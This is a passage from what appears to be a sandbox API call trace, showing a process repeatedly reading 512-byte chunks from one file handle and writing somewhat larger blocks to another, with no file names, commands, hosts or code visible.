nNumberOfBytesToWrite=0x229, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0021.061] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd204, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1cc, lpOverlapped=0x0 | out: lpBuffer=0x4bd204*, lpNumberOfBytesRead=0x4bd1cc*=0x200, lpOverlapped=0x0) returned 1 [0021.061] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x24d, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0021.062] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd204, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1cc, lpOverlapped=0x0 | out: lpBuffer=0x4bd204*, lpNumberOfBytesRead=0x4bd1cc*=0x200, lpOverlapped=0x0) returned 1 [0021.062] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x251, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0021.063] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd204, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1cc, lpOverlapped=0x0 | out: lpBuffer=0x4bd204*, lpNumberOfBytesRead=0x4bd1cc*=0x200, lpOverlapped=0x0) returned 1 [0021.063] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x230, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0021.064] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd204, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1cc, lpOverlapped=0x0 | out: lpBuffer=0x4bd204*, lpNumberOfBytesRead=0x4bd1cc*=0x200, lpOverlapped=0x0) returned 1 [0021.064] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x24b, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0021.064] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd204, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1cc, lpOverlapped=0x0 | out: lpBuffer=0x4bd204*, lpNumberOfBytesRead=0x4bd1cc*=0x200, lpOverlapped=0x0) returned 1 [0021.065] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x24c, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0021.065] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd204, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1cc, lpOverlapped=0x0 | out: lpBuffer=0x4bd204*, lpNumberOfBytesRead=0x4bd1cc*=0x200, lpOverlapped=0x0) returned 1 [0021.066] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x248, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0021.066] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd204, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1cc, lpOverlapped=0x0 | out: lpBuffer=0x4bd204*, lpNumberOfBytesRead=0x4bd1cc*=0x200, lpOverlapped=0x0) returned 1 [0021.067] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x263, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0021.067] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd204, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1cc, lpOverlapped=0x0 | out: lpBuffer=0x4bd204*, lpNumberOfBytesRead=0x4bd1cc*=0x200, lpOverlapped=0x0) returned 1 [0021.068] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x252, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0021.068] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd204, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1cc, lpOverlapped=0x0 | out: lpBuffer=0x4bd204*, lpNumberOfBytesRead=0x4bd1cc*=0x200, lpOverlapped=0x0) returned 1 [0021.089] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x24a, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0021.090] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd204, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1cc, lpOverlapped=0x0 | out: lpBuffer=0x4bd204*, lpNumberOfBytesRead=0x4bd1cc*=0x200, lpOverlapped=0x0) returned 1 [0021.090] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x27f, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0021.091] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd204, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1cc, lpOverlapped=0x0 | out: lpBuffer=0x4bd204*, lpNumberOfBytesRead=0x4bd1cc*=0x200, lpOverlapped=0x0) returned 1 [0021.091] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x236, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0021.092] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd204, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1cc, lpOverlapped=0x0 | out: lpBuffer=0x4bd204*, lpNumberOfBytesRead=0x4bd1cc*=0x200, lpOverlapped=0x0) returned 1 [0021.092] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x259, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0021.093] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd204, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1cc, lpOverlapped=0x0 | out: lpBuffer=0x4bd204*, lpNumberOfBytesRead=0x4bd1cc*=0x200, lpOverlapped=0x0) returned 1 [0021.093] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x25b, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0021.094] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd204, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1cc, lpOverlapped=0x0 | out: lpBuffer=0x4bd204*, lpNumberOfBytesRead=0x4bd1cc*=0x200, lpOverlapped=0x0) returned 1 [0021.094] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x256, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0021.095] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd204, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1cc, lpOverlapped=0x0 | out: lpBuffer=0x4bd204*, lpNumberOfBytesRead=0x4bd1cc*=0x200, lpOverlapped=0x0) returned 1 [0021.095] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x278, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0021.096] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd204, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1cc, lpOverlapped=0x0 | out: lpBuffer=0x4bd204*, lpNumberOfBytesRead=0x4bd1cc*=0x200, lpOverlapped=0x0) returned 1 [0021.096] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x24d, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0021.097] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd204, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1cc, lpOverlapped=0x0 | out: lpBuffer=0x4bd204*, lpNumberOfBytesRead=0x4bd1cc*=0x200, lpOverlapped=0x0) returned 1 [0021.097] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x2cd, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0021.098] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd204, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1cc, lpOverlapped=0x0 | out: lpBuffer=0x4bd204*, lpNumberOfBytesRead=0x4bd1cc*=0x200, lpOverlapped=0x0) returned 1 [0021.098] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x260, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0021.098] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd204, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1cc, lpOverlapped=0x0 | out: lpBuffer=0x4bd204*, lpNumberOfBytesRead=0x4bd1cc*=0x200, lpOverlapped=0x0) returned 1 [0021.099] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x209, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0021.100] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd204, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1cc, lpOverlapped=0x0 | out: lpBuffer=0x4bd204*, lpNumberOfBytesRead=0x4bd1cc*=0x200, lpOverlapped=0x0) returned 1 [0021.100] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x22e, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0021.101] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd204, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1cc, lpOverlapped=0x0 | out: lpBuffer=0x4bd204*, lpNumberOfBytesRead=0x4bd1cc*=0x200, lpOverlapped=0x0) returned 1 [0021.101] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x1c9, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0021.102] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd204, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1cc, lpOverlapped=0x0 | out: lpBuffer=0x4bd204*, lpNumberOfBytesRead=0x4bd1cc*=0x200, lpOverlapped=0x0) returned 1 [0021.102] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x21f, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0021.103] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd204, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1cc, lpOverlapped=0x0 | out: lpBuffer=0x4bd204*, lpNumberOfBytesRead=0x4bd1cc*=0x200, lpOverlapped=0x0) returned 1 [0021.103] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x270, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0021.104] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd204, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1cc, lpOverlapped=0x0 | out: lpBuffer=0x4bd204*, lpNumberOfBytesRead=0x4bd1cc*=0x200, lpOverlapped=0x0) returned 1 [0021.104] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x22f, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0021.105] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd204, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1cc, lpOverlapped=0x0 | out: lpBuffer=0x4bd204*, lpNumberOfBytesRead=0x4bd1cc*=0x200, lpOverlapped=0x0) returned 1 [0021.105] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x258, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0021.106] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd204, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1cc, lpOverlapped=0x0 | out: lpBuffer=0x4bd204*, lpNumberOfBytesRead=0x4bd1cc*=0x200, lpOverlapped=0x0) returned 1 [0021.106] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x25d, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0021.107] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd204, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1cc, lpOverlapped=0x0 | out: lpBuffer=0x4bd204*, lpNumberOfBytesRead=0x4bd1cc*=0x200, lpOverlapped=0x0) returned 1 [0021.107] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x279, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0021.108] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd204, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1cc, lpOverlapped=0x0 | out: lpBuffer=0x4bd204*, lpNumberOfBytesRead=0x4bd1cc*=0x200, lpOverlapped=0x0) returned 1 [0021.108] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x282, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0021.109] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd204, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1cc, lpOverlapped=0x0 | out: lpBuffer=0x4bd204*, lpNumberOfBytesRead=0x4bd1cc*=0x200, lpOverlapped=0x0) returned 1 [0021.109] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x26f, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0021.109] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd204, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1cc, lpOverlapped=0x0 | out: lpBuffer=0x4bd204*, lpNumberOfBytesRead=0x4bd1cc*=0x200, lpOverlapped=0x0) returned 1 [0021.110] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x269, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0021.110] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd204, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1cc, lpOverlapped=0x0 | out: lpBuffer=0x4bd204*, lpNumberOfBytesRead=0x4bd1cc*=0x200, lpOverlapped=0x0) returned 1 [0021.111] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x2e5, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0021.111] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd204, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1cc, lpOverlapped=0x0 | out: lpBuffer=0x4bd204*, lpNumberOfBytesRead=0x4bd1cc*=0x200, lpOverlapped=0x0) returned 1 [0021.112] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0021.112] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd204, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1cc, lpOverlapped=0x0 | out: lpBuffer=0x4bd204*, lpNumberOfBytesRead=0x4bd1cc*=0x200, lpOverlapped=0x0) returned 1 [0021.113] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x264, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0021.113] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd204, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1cc, lpOverlapped=0x0 | out: lpBuffer=0x4bd204*, lpNumberOfBytesRead=0x4bd1cc*=0x200, lpOverlapped=0x0) returned 1 [0021.114] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x26b, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0021.114] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd204, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1cc, lpOverlapped=0x0 | out: lpBuffer=0x4bd204*, lpNumberOfBytesRead=0x4bd1cc*=0x200, lpOverlapped=0x0) returned 1 [0021.115] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x27d, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0021.115] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd204, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1cc, lpOverlapped=0x0 | out: lpBuffer=0x4bd204*, lpNumberOfBytesRead=0x4bd1cc*=0x200, lpOverlapped=0x0) returned 1 [0021.116] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x2a5, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0021.116] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd204, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1cc, lpOverlapped=0x0 | out: lpBuffer=0x4bd204*, lpNumberOfBytesRead=0x4bd1cc*=0x200, lpOverlapped=0x0) returned 1 [0021.117] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x2a0, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0021.117] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd204, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1cc, lpOverlapped=0x0 | out: lpBuffer=0x4bd204*, lpNumberOfBytesRead=0x4bd1cc*=0x200, lpOverlapped=0x0) returned 1 [0021.118] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x2e8, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0021.118] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd204, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1cc, lpOverlapped=0x0 | out: lpBuffer=0x4bd204*, lpNumberOfBytesRead=0x4bd1cc*=0x200, lpOverlapped=0x0) returned 1 [0021.119] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x29e, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0021.119] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd204, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1cc, lpOverlapped=0x0 | out: lpBuffer=0x4bd204*, lpNumberOfBytesRead=0x4bd1cc*=0x200, lpOverlapped=0x0) returned 1 [0021.120] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x2be, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0021.120] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd204, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1cc, lpOverlapped=0x0 | out: lpBuffer=0x4bd204*, lpNumberOfBytesRead=0x4bd1cc*=0x200, lpOverlapped=0x0) returned 1 [0021.121] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x296, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0021.121] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd204, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1cc, lpOverlapped=0x0 | out: lpBuffer=0x4bd204*, lpNumberOfBytesRead=0x4bd1cc*=0x200, lpOverlapped=0x0) returned 1 [0021.122] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x28a, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0021.122] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd204, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1cc, lpOverlapped=0x0 | out: lpBuffer=0x4bd204*, lpNumberOfBytesRead=0x4bd1cc*=0x200, lpOverlapped=0x0) returned 1 [0021.122] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x29d, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0021.123] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd204, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1cc, lpOverlapped=0x0 | out: lpBuffer=0x4bd204*, lpNumberOfBytesRead=0x4bd1cc*=0x200, lpOverlapped=0x0) returned 1 [0021.123] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x25b, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0021.124] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd204, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1cc, lpOverlapped=0x0 | out: lpBuffer=0x4bd204*, lpNumberOfBytesRead=0x4bd1cc*=0x200, lpOverlapped=0x0) returned 1 [0021.124] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x27e, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0021.125] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd204, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1cc, lpOverlapped=0x0 | out: lpBuffer=0x4bd204*, lpNumberOfBytesRead=0x4bd1cc*=0x200, lpOverlapped=0x0) returned 1 [0021.125] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x254, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0021.126] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd204, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1cc, lpOverlapped=0x0 | out: lpBuffer=0x4bd204*, lpNumberOfBytesRead=0x4bd1cc*=0x200, lpOverlapped=0x0) returned 1 [0021.126] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x266, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0021.127] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd204, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1cc, lpOverlapped=0x0 | out: lpBuffer=0x4bd204*, lpNumberOfBytesRead=0x4bd1cc*=0x200, lpOverlapped=0x0) returned 1 [0021.127] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x27c, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0021.128] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd204, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1cc, lpOverlapped=0x0 | out: lpBuffer=0x4bd204*, lpNumberOfBytesRead=0x4bd1cc*=0x200, lpOverlapped=0x0) returned 1 [0021.128] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x2de, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0021.129] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd204, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1cc, lpOverlapped=0x0 | out: 